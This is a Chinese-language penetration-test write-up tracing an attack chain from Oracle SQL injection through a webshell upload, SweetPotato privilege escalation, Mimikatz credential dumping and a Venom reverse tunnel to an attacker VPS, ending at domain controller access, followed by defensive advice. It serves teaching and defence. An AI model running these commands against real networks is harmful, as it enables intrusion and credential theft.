从SQL注入到幸运域控
字数 1562 2025-08-15 21:32:54

从SQL注入到域控渗透实战教学文档

1. 渗透测试前期准备

1.1 目标信息收集

  • 范围确认:明确授权测试范围(本例为2个域名+2个IP)
  • 基础信息收集
    • 端口扫描(Nmap等工具)
    • 网站敏感目录/文件扫描(DirBuster、Dirsearch等)
    • Web应用指纹识别(WhatWeb、Wappalyzer等)
    • 站点功能分析(手动浏览)

1.2 重点目标筛选

从收集信息中筛选关键点:

  1. 目录爆破发现的后台管理系统
  2. 存在可疑参数的页面

2. Web应用渗透阶段

2.1 后台管理系统测试

  • 暴力破解测试
    • 手工尝试常见弱口令
    • 使用定制字典进行爆破(Burp Intruder等)
  • 注入测试
    • 传统SQL注入尝试
    • 结果:未发现有效漏洞

2.2 SQL注入漏洞利用

  1. 漏洞发现

    • 在xx参数位置测试SQL注入
    • 观察到明显报错信息(Oracle数据库特有报错风格)

  2. 自动化工具利用

    sqlmap -u "目标URL" --risk=3 --level=5 --dbms=oracle
    • 确认Oracle数据库
    • 枚举数据库结构

  3. 关键数据获取

    • 从数据库中提取后台管理员凭据
    • 密码为加密形式,使用cmd5.com等平台解密

2.3 后台权限获取

  • 使用解密后的凭据成功登录后台
  • 检查后台功能模块,寻找上传点

3. 获取WebShell

3.1 文件上传漏洞利用

  1. 上传点测试

    • 封面图片上传功能
    • 资质图片上传功能

  2. 绕过前端验证

    • 原始尝试:ASP马改为jpg后缀 → 失败
    • 发现仅前端验证:
      • 使用Burp拦截请求
      • 修改文件后缀为ashx(或其他可执行后缀)
      • 成功上传

  3. WebShell连接

    • 获取上传文件路径
    • 使用中国菜刀/蚁剑等工具连接

4. 内网横向移动

4.1 权限提升

  1. 环境确认

    whoami
systeminfo
    • 当前权限:普通域用户
    • 系统:Windows Server 2008 R2

  2. 甜土豆提权

    SweetPotato.exe
    • 成功获取SYSTEM权限

4.2 凭据获取

  1. 使用Mimikatz

    mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
    • 获取NTLM哈希/明文密码
    • 使用cmd5.com解密哈希

  2. 远程桌面连接

    • 使用获取的Administrator密码登录
    • 确认服务器可通外网且为内网机器

4.3 内网代理建立

  1. 使用Venom搭建隧道

    • 服务端(VPS): 
      ./admin -lport 6666
    • 客户端(目标服务器): 
      agent.exe -rhost VPS_IP -rport 6666

  2. SOCKS代理设置

    socks 6767
    • 本地使用Proxifier配置代理
    • 实现全局流量转发

5. 域环境渗透

5.1 域信息收集

  1. 域控制器枚举

    net group "Domain Controllers" /Domain
    • 发现3台域控制器(主备架构)

  2. 域管用户查询

    net group "Domain Admins" /Domain
    • 列出所有域管理员账户

5.2 域控登录尝试

  1. 密码复用测试

    • 使用之前获取的域管密码
    • 尝试登录域控制器(xxx-DC)

  2. 成功访问域控

    • 确认域控权限获取
    • 项目目标达成

6. 关键工具与技术总结

工具/技术 用途 备注
SQLMap Oracle注入利用 参数:--dbms=oracle
Burp Suite 拦截修改上传请求 绕过前端验证
Mimikatz 凭据提取 需debug权限
SweetPotato Windows提权 Server 2008 R2适用
Venom 内网代理 支持多节点管理

7. 防御建议

  1. Web应用层

    • 参数化查询防止SQL注入
    • 上传功能实施服务端验证
    • 后台管理加强认证

  2. 系统层

    • 定期更换高权限账户密码
    • 限制域管账户登录范围
    • 启用LSA保护防凭据窃取

  3. 网络层

    • 部署WAF防护Web攻击
    • 网络分段限制横向移动
    • 监控异常代理行为

8. 学习要点

  1. 完整攻击链构建

    • 从外网Web漏洞到内网域控的完整路径

  2. 密码复用风险

    • 内网密码重复使用的危险性

  3. 权限维持技术

    • 代理通道建立方法
    • 内网横向移动技术

  4. 工具组合使用

    • 各类工具在渗透各阶段的应用场景
从SQL注入到域控渗透实战教学文档 1. 渗透测试前期准备 1.1 目标信息收集 范围确认 :明确授权测试范围(本例为2个域名+2个IP) 基础信息收集 : 端口扫描(Nmap等工具) 网站敏感目录/文件扫描(DirBuster、Dirsearch等) Web应用指纹识别(WhatWeb、Wappalyzer等) 站点功能分析(手动浏览) 1.2 重点目标筛选 从收集信息中筛选关键点: 目录爆破发现的后台管理系统 存在可疑参数的页面 2. Web应用渗透阶段 2.1 后台管理系统测试 暴力破解测试 : 手工尝试常见弱口令 使用定制字典进行爆破(Burp Intruder等) 注入测试 : 传统SQL注入尝试 结果:未发现有效漏洞 2.2 SQL注入漏洞利用 漏洞发现 : 在xx参数位置测试SQL注入 观察到明显报错信息(Oracle数据库特有报错风格) 自动化工具利用 : 确认Oracle数据库 枚举数据库结构 关键数据获取 : 从数据库中提取后台管理员凭据 密码为加密形式,使用cmd5.com等平台解密 2.3 后台权限获取 使用解密后的凭据成功登录后台 检查后台功能模块,寻找上传点 3. 获取WebShell 3.1 文件上传漏洞利用 上传点测试 : 封面图片上传功能 资质图片上传功能 绕过前端验证 : 原始尝试:ASP马改为jpg后缀 → 失败 发现仅前端验证: 使用Burp拦截请求 修改文件后缀为ashx(或其他可执行后缀) 成功上传 WebShell连接 : 获取上传文件路径 使用中国菜刀/蚁剑等工具连接 4. 内网横向移动 4.1 权限提升 环境确认 : 当前权限:普通域用户 系统:Windows Server 2008 R2 甜土豆提权 : 成功获取SYSTEM权限 4.2 凭据获取 使用Mimikatz : 获取NTLM哈希/明文密码 使用cmd5.com解密哈希 远程桌面连接 : 使用获取的Administrator密码登录 确认服务器可通外网且为内网机器 4.3 内网代理建立 使用Venom搭建隧道 : 服务端(VPS): 客户端(目标服务器): SOCKS代理设置 : 本地使用Proxifier配置代理 实现全局流量转发 5. 域环境渗透 5.1 域信息收集 域控制器枚举 : 发现3台域控制器(主备架构) 域管用户查询 : 列出所有域管理员账户 5.2 域控登录尝试 密码复用测试 : 使用之前获取的域管密码 尝试登录域控制器(xxx-DC) 成功访问域控 : 确认域控权限获取 项目目标达成 6. 关键工具与技术总结 | 工具/技术 | 用途 | 备注 | |-----------|------|------| | SQLMap | Oracle注入利用 | 参数:--dbms=oracle | | Burp Suite | 拦截修改上传请求 | 绕过前端验证 | | Mimikatz | 凭据提取 | 需debug权限 | | SweetPotato | Windows提权 | Server 2008 R2适用 | | Venom | 内网代理 | 支持多节点管理 | 7. 防御建议 Web应用层 : 参数化查询防止SQL注入 上传功能实施服务端验证 后台管理加强认证 系统层 : 定期更换高权限账户密码 限制域管账户登录范围 启用LSA保护防凭据窃取 网络层 : 部署WAF防护Web攻击 网络分段限制横向移动 监控异常代理行为 8. 学习要点 完整攻击链构建 : 从外网Web漏洞到内网域控的完整路径 密码复用风险 : 内网密码重复使用的危险性 权限维持技术 : 代理通道建立方法 内网横向移动技术 工具组合使用 : 各类工具在渗透各阶段的应用场景